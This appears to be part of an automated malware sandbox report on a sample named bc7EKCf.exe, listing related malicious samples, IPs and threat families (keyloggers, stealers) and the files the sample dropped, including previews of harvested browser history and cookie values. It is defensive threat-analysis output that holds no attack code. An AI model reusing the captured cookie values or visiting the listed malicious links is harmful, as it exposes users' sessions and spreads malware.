                                                                                                                                                                                                                                                      • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                                      04:59:05API Interceptor77x Sleep call for process: bc7EKCf.exe modified
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      149.154.167.220PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                        BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                            HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                              oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                                  spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                                    random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                                                                      random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                                                                        HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                                                                                                                                                                          18.244.18.27w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                        seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                              18.238.49.74din.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                        https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                          https://www.canva.com/design/DAGEBBzq9KM/jvjE01qRbaOyWhWyDOHDeg/view?utm_content=DAGEBBzq9KM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            http://www.vendella.co.nzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                              https://aolserv.pages.dev/robots.txtIP:Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                https://www.canva.com/design/DAF6EQJ4C4g/RbN6H2_tIuSyQea_uekL9g/view?utm_content=DAF6EQJ4C4g&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                  fg.microsoft.map.fastly.netSecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                                  nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                                  ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  chrome.cloudflare-dns.comSwift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                                                  SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                                                  SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                                  SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                                                  LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                                  Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                                  Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                                                  w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                                  w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                                  17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                                  bg.microsoft.map.fastly.netGT98765009064.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                                  SmartDeploy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                                  EEdSGSana5.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  Magicleap-bonus disbursment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  Selvi Payroll Benefits & Bonus Agreementfdp.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                                  atomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                                  proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                                  Payment-Order #24560274 for 8,380 USD.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                  AMAZON-02UShttps://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 18.185.193.107
                                                                                                                                                                                                                                                                                                                  4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 13.254.105.184
                                                                                                                                                                                                                                                                                                                  https://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                  • 34.253.40.242
                                                                                                                                                                                                                                                                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                                                                  QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                  • 76.223.54.146
                                                                                                                                                                                                                                                                                                                  ssl.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                                                                  ssd.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                                                                                                                  • 34.243.160.129
                                                                                                                                                                                                                                                                                                                  http://join.grass-io.ccGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 76.223.55.101
                                                                                                                                                                                                                                                                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                                                                  mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                                                                  TELEGRAMRU5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                                                                  PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  AMAZON-02UShttps://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 18.185.193.107
                                                                                                                                                                                                                                                                                                                  4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 13.254.105.184
                                                                                                                                                                                                                                                                                                                  https://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                  • 34.253.40.242
                                                                                                                                                                                                                                                                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                                                                  QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                  • 76.223.54.146
                                                                                                                                                                                                                                                                                                                  ssl.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                                                                  ssd.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                                                                                                                  • 34.243.160.129
                                                                                                                                                                                                                                                                                                                  http://join.grass-io.ccGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 76.223.55.101
                                                                                                                                                                                                                                                                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                                                                  mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0es7.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  chrtrome22.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  Purchase Order A2409002.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  Ref#103052.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  NEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  https://redduppgh.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  https://minia.n1tab.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):256
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.5769748112580575
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:5j1lZjJtZj1lZjXZjsm2tZjsm2tZjsm2tZjsm2tZjFtt:5jRjJPjRjpjsmsjsmsjsmsjsmsjDt
                                                                                                                                                                                                                                                                                                                  MD5:41E0B253AB762FA321090D38AE25D87A
                                                                                                                                                                                                                                                                                                                  SHA1:DA3248C91BA1E2C284C27E50F081FC9B10E3622D
                                                                                                                                                                                                                                                                                                                  SHA-256:C60AB933FE00BE7A85E5052021F48AAA94554FE258D9DE6B826182DBC4BD9975
                                                                                                                                                                                                                                                                                                                  SHA-512:35B745CB74D1483B14614144764C2AD6748D5E195B8D8FED8349C9A2D702DA22AD7B8944F73ED4044032250D788C0588208261C5B2A7237BB04D9745E294D111
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:PK........k')Z............PK........g')Z............PK........k')Z............PK........c')Z............PK.........>CW............PK.........>CW............PK.........>CW............PK.........>CW............PK........e')Z............PK....................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):220
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.546534105739819
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Kw5FBeKjMnf3eKj5ZKMeKjYLC/eKjtyRE2YReK3:KCBH4n/HHKMHsL0HMRE2uH3
                                                                                                                                                                                                                                                                                                                  MD5:2AB1FD921B6C195114E506007BA9FE05
                                                                                                                                                                                                                                                                                                                  SHA1:90033C6EE56461CA959482C9692CF6CFB6C5C6AF
                                                                                                                                                                                                                                                                                                                  SHA-256:C79CFDD6D0757EB52FBB021E7F0DA1A2A8F1DD81DCD3A4E62239778545A09ECC
                                                                                                                                                                                                                                                                                                                  SHA-512:4F0570D7C7762ECB4DCF3171AE67DA3C56AA044419695E5A05F318E550F1A910A616F5691B15ABFE831B654718EC97A534914BD172AA7A963609EBD8E1FAE0A5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:Title: Get Help.URL: (No URL provided)..Title: Customize Firefox.URL: (No URL provided)..Title: Get Involved.URL: (No URL provided)..Title: About Us.URL: (No URL provided)..Title: Getting Started.URL: (No URL provided)..
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):94
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.890995272476094
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:qtNRROrSLvIJiMhKVX3L2WdXOfZiGPHA9lfMJJEv:MeGLciA8dXwZiG/CF0Ev
                                                                                                                                                                                                                                                                                                                  MD5:A72509876646BC379E1D8C3B895ED0ED
                                                                                                                                                                                                                                                                                                                  SHA1:2F270C6A8E07FA7FEE8C07A1FD100474A9A513A8
                                                                                                                                                                                                                                                                                                                  SHA-256:8BF712CABAC55E09FF74348817A29572826688AE4AB516848FE882BC5DEF91E7
                                                                                                                                                                                                                                                                                                                  SHA-512:FDCB7BB82C0AF434610311D7B12EB2D6AEF7ADB8B040EBA97D3F115C18810799EEDC02B39AF6992C15552568B5BC799889CC185191D5E783DEB82DC98946A5EB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:URL: https://www.mozilla.org/en-US/privacy/firefox/.Title: Firefox Privacy Notice . Mozilla.
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):423
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.641872385849232
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:N5sTkk4Ukzq6yGUL9q64j0LfNRkqAdEI86fqfynykpp9QOy:PsTqzqa6m0Lf8ddEIpfkMykxQOy
                                                                                                                                                                                                                                                                                                                  MD5:42708AD6BEB412A5223C68D68A2C9F85
                                                                                                                                                                                                                                                                                                                  SHA1:E57283A182EC2E0F7081407ABEA40E67331DA8FF
                                                                                                                                                                                                                                                                                                                  SHA-256:57D009313C240E82F643047E874CF01FA23EA27D22D0D507D4376BBF8F860CC8
                                                                                                                                                                                                                                                                                                                  SHA-512:91B45203ABCFFE4639883EFDEC082694C2A2FDC98E43F9B8AEF72071F42CF0CDED40A9C22CA35EC698C4C32DB6FAF00F641705B2C222F7197B1146C1C599A7CA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[.. {.. "domain": ".google.com",.. "name": "NID",.. "path": "/",.. "expirationDate": 1752242354,.. "value": "520=NSIHbnOuyGsHwQqtqOrUsuozBQdQz52u9xXTDA6JVOQkgDwElfRK1E7dNylFPufWhdnCAC1crNPySQdJMS2Pi12AOGr9V8R3dmgtMSCfyx3-t4LY3Lsz2j3dX3cwmaVViBOyMj9iO79AAqFcoZl4Gbi5lkstbs_mMye_R54QFSOAV2WY1shSY-A",.. "secure": false,.. "httpOnly": false,.. "sameSite": "no_restriction",.. "storeId": "0".. }..]
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):261
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.911203771471141
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:TIMPXshPSlk1HtmQsTALe0bu6XorP0LfNIHIX0qAW0EaOy86Y:TIMPgGUL9q64j0LfNRkqAdEI86Y
                                                                                                                                                                                                                                                                                                                  MD5:596945CDCA9FECFCE0494184F09527DB
                                                                                                                                                                                                                                                                                                                  SHA1:8D469110C7C069F72C9AD2834E7E0B5B90976155
                                                                                                                                                                                                                                                                                                                  SHA-256:F7D41B28E9306CEBC94DA68A9C5DFC57B12DEE852EC12C73AC432A2160CECED8
                                                                                                                                                                                                                                                                                                                  SHA-512:3FBD72A7A425E902C8EF45024CD649071DCB191C62CF2083D367FAFC1D9B78F4CD8666FC208F615C4F813681FB90CF24A240C3F9F6FB187F0A268712C6AE25FA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:Host: .google.com.Path: /.Expires: 2025-07-11 09:59:14.Name: NID.Value: 520=NSIHbnOuyGsHwQqtqOrUsuozBQdQz52u9xXTDA6JVOQkgDwElfRK1E7dNylFPufWhdnCAC1crNPySQdJMS2Pi12AOGr9V8R3dmgtMSCfyx3-t4LY3Lsz2j3dX3cwmaVViBOyMj9iO79AAqFcoZl4Gbi5lkstbs_mMye_R54QFSOAV2WY1shSY-A..
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):244
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.087743120757909
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Uqf7R5WzLVMz3eYeDPO+YtnJXQcOG4E2WzLVMz3eYeDPOCd4:UO2zGjeDDPOtnKcOHPWzGjeDDPO7
                                                                                                                                                                                                                                                                                                                  MD5:4C0A246FFF442FDA266D22D0038B1D16
                                                                                                                                                                                                                                                                                                                  SHA1:9EC99F882E0D4B9B9305AADBA1875F88CF7A740D
                                                                                                                                                                                                                                                                                                                  SHA-256:44F3AB1DC0DC9397D7CE58C447533146360F68AFD3114D22AAE5056B10EC0E24
                                                                                                                                                                                                                                                                                                                  SHA-512:6E1C3DB12EBAA416448581C24D7FB1DD7F34BBD1FB40E8657B8A8FEBA9653E99BCD31B599DC7CA52E31C5560ECEA8E40B73C7E6DE1362AFF459E59F5B18B6D8D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:URL: Examples of Office product keys - Microsoft Support.Title: https://go.microsoft.com/fwlink/?linkid=851546..URL: Install the English Language Pack for 32-bit Office - Microsoft Support.Title: https://go.microsoft.com/fwlink/?LinkId=2106243.
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2377
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.822799276982426
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:PsayOB/sshOB/sZiVcOB/sKhOB/szwOB/snwOB/sm15f/OB/sHX6OB/s3UG0/Oy:9ITGe+xfW6pGwWy
                                                                                                                                                                                                                                                                                                                  MD5:576EF1F2BB22078811EC3BE17EFCAC2F
                                                                                                                                                                                                                                                                                                                  SHA1:E0A026700CF2CEC5F0A86B331766339D501BF2D5
                                                                                                                                                                                                                                                                                                                  SHA-256:25B11B0E39386679802C7CE753875FDAF9CA812C6422326E7DFDAF7A94E8662D
                                                                                                                                                                                                                                                                                                                  SHA-512:7C9A5DFB2BBC262F2CAB781443D6B080D36FAFCC9E0FD7A0BC72E5A410DE027806E54BB92E1CDCFAA72C5BDA6B6BE55B661AB304F99A591931843818C5DDD680
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[.. {.. "domain": "ntp.msn.com",.. "name": "_C_Auth",.. "path": "/edge",.. "expirationDate": 17999,.. "value": "",.. "secure": false,.. "httpOnly": false,.. "sameSite": "no_restriction",.. "storeId": "0".. },.. {.. "domain": ".msn.com",.. "name": "_C_ETH",.. "path": "/",.. "expirationDate": 17999,.. "value": "1",.. "secure": false,.. "httpOnly": false,.. "sameSite": "no_restriction",.. "storeId": "0".. },.. {.. "domain": "ntp.msn.com",.. "name": "sptmarket",.. "path": "/",.. "expirationDate": 1770994759,.. "value": "en-GB||us|en-us|en-us|en||cf=8|RefA=B22F4747DBD8407584046BCAED3AA480.RefC=2025-01-09T09:59:19Z",.. "secure": false,.. "httpOnly": false,.. "sameSite": "no_restriction",.. "storeId": "0".. },.. {.. "domain": ".msn.com",.. "name": "USRLOC",.. "path": "/",.. "expirationDate": 1770994759,.. "value": "",.. "secure": false,.. "httpOnly": false,.. "sameSite": "no_restric
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):953
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.385180160985689
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TdDyjygfV4ygXygcTygc7yZKfDygcwd0ygGsnU/w:heGAVltxWx2ZKfexwdPsnUo
                                                                                                                                                                                                                                                                                                                  MD5:B2EEC98C25513B04D45C728B5825F0E4
                                                                                                                                                                                                                                                                                                                  SHA1:7AC4F9E97728AAF759F9E36D9453E78B96916C76
                                                                                                                                                                                                                                                                                                                  SHA-256:9DD110246D1CA65F114DB9B42F5F34B373C283A27113C66C6BA39228206FFBBA
